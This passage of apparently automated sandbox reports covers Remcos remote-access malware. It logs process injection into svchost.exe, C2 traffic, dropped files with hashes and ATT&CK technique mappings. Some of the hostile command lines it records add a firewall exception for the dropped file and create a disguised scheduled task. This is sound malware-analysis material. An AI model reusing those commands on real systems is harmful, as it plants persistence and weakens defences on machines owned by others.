\"C:\\ProgramData\\db\\music.exe\" (Handle: 1056)\n \"music.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 216)\n \"music.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 216)\n \"music.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 216)\n \"music.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 208)\n \"music.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 208)\n \"music.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 208)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"music.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\svchost.exe\" - (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-134", "type": 6, "relevance": 10, "name": "Creates a system process in suspended mode (likely for process injection)", "description": "\"music.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\svchost.exe\" - (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"music.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"music.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"music.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"music.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:2404", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"music.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2404", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Remcos 3.x Unencrypted Checkin\" (SID: 2032776, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)\n Detected alert \"ET MALWARE Remcos 3.x Unencrypted Server Response\" (SID: 2032777, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (D)", "origin": "External System"}]}
8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879
https://hybrid-analysis.com/sample/8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879
Hybrid Analysis - Remcos
{"size": 39329792, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879", "sha256": "8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879", "av_detect": 76, "vx_family": "Jalapeno.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 10, "total_signatures": 340, "extracted_files": [{"name": "GameSDK.exe", "file_path": "%ALLUSERSPROFILE%\\GameSDK.exe", "file_size": 23040, "sha256": "4cc11297a2bd2f4d4cbbb8ed3123e46db325a0808a29499897c34e3e49d392f9", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "GameSDK.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "5b4af3576e30808651ae14fbef1ee719.exe", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe", "file_size": 23040, "sha256": "4cc11297a2bd2f4d4cbbb8ed3123e46db325a0808a29499897c34e3e49d392f9", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "GameSDK.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "host.exe", "file_path": "%APPDATA%\\host.exe", "file_size": 23040, "sha256": "4cc11297a2bd2f4d4cbbb8ed3123e46db325a0808a29499897c34e3e49d392f9", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CL_Debug_Log.txt", "file_path": "%TEMP%\\CL_Debug_Log.txt", "file_size": 739840, "sha256": "ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (console) Intel 80386, for MS Windows", "runtime_process": "Stable_Network.exe (PID: 6124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SystemCheck.xml", "file_path": "%TEMP%\\SystemCheck.xml", "file_size": 2152, "sha256": "a08b36bde4948ac2878d5aaaad2e2cacf0ed2b1fde097b9c6ae2d777843b1d4f", "type_tags": ["text"], "description": "XML 1.0 document, ASCII text, with CRLF line terminators", "runtime_process": "Stable_Network.exe (PID: 6124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "aut3301.tmp", "file_path": "%TEMP%\\aut3301.tmp", "file_size": 5177344, "sha256": "827205c79aa8adb2ffd58a4cbd4a52b7f7d4a93a8b45c3d5f228110ffebb2f65", "type_tags": ["data"], "description": "data", "runtime_process": "Stable_Network.exe (PID: 6124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "aut8E99.tmp", "file_path": "%TEMP%\\aut8E99.tmp", "file_size": 501714, "sha256": "17b4e7a85169b27a7f92cdfa8d89bca739cebd15b17bc2d709517e3364ea886f", "type_tags": ["data"], "description": "data", "runtime_process": "Stable_Network.exe (PID: 6124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rundl32.exe", "file_path": "%TEMP%\\rundl32.exe", "file_size": 33280, "sha256": "52055979386ff9f81bceaa8a2a2e2be3f0f78e74097bf34b7c7aa8bd0cd01033", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "rundl32.exe (PID: 6060)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006040", "name": "8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe", "normalized_path": "C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe", "sha256": "8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879", "av_label": "Dropper.MSIL", "av_matched": 10, "av_total": 22}, {"uid": "00000000-00006060", "parentuid": "00000000-00006040", "name": "rundl32.exe", "normalized_path": "%TEMP%\\rundl32.exe", "sha256": "52055979386ff9f81bceaa8a2a2e2be3f0f78e74097bf34b7c7aa8bd0cd01033"}, {"uid": "00000000-00006124", "parentuid": "00000000-00006040", "name": "Stable_Network.exe", "normalized_path": "%APPDATA%\\Stable_Network.exe", "sha256": "8753515f422c81bf9bf921d9857f5f7ee0b3f47573e84129092e095147eebd63"}, {"uid": "00000000-00003864", "parentuid": "00000000-00006124", "name": "CL_Debug_Log.txt", "normalized_path": "%TEMP%\\CL_Debug_Log.txt", "command_line": "e -p\"JDQJndnqwdnqw2139dn21n3b312idDQDB\" \"%TEMP%\\CR_Debug_Log.txt\" -o\"%TEMP%\\\"", "sha256": "ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d"}, {"uid": "00000000-00004380", "parentuid": "00000000-00006124", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c schtasks.exe /Create /XML \"%TEMP%\\SystemCheck.xml\" /TN \"System\\SystemCheck\"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00000468", "parentuid": "00000000-00004380", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\system32\\schtasks.exe", "command_line": "/Create /XML \"%TEMP%\\SystemCheck.xml\" /TN \"System\\SystemCheck\"", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00006136", "parentuid": "00000000-00006040", "name": "host.exe", "normalized_path": "%APPDATA%\\host.exe", "sha256": "4cc11297a2bd2f4d4cbbb8ed3123e46db325a0808a29499897c34e3e49d392f9"}, {"uid": "00000000-00003876", "parentuid": "00000000-00006136", "name": "GameSDK.exe", "normalized_path": "%ALLUSERSPROFILE%\\GameSDK.exe", "sha256": "4cc11297a2bd2f4d4cbbb8ed3123e46db325a0808a29499897c34e3e49d392f9"}, {"uid": "00000000-00003972", "parentuid": "00000000-00003876", "name": "netsh.exe", "normalized_path": "%WINDIR%\\system32\\netsh.exe", "command_line": "netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\GameSDK.exe\" \"GameSDK.exe\" ENABLE", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004064", "parentuid": "00000000-00006040", "name": "dw20.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe", "command_line": "-x -s 836", "sha256": "728f9cfd55a2d64816805bce935e28034755374e0163a3415f33ad807fbc91cc"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 1, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 18}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 2, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 2, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 2, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": 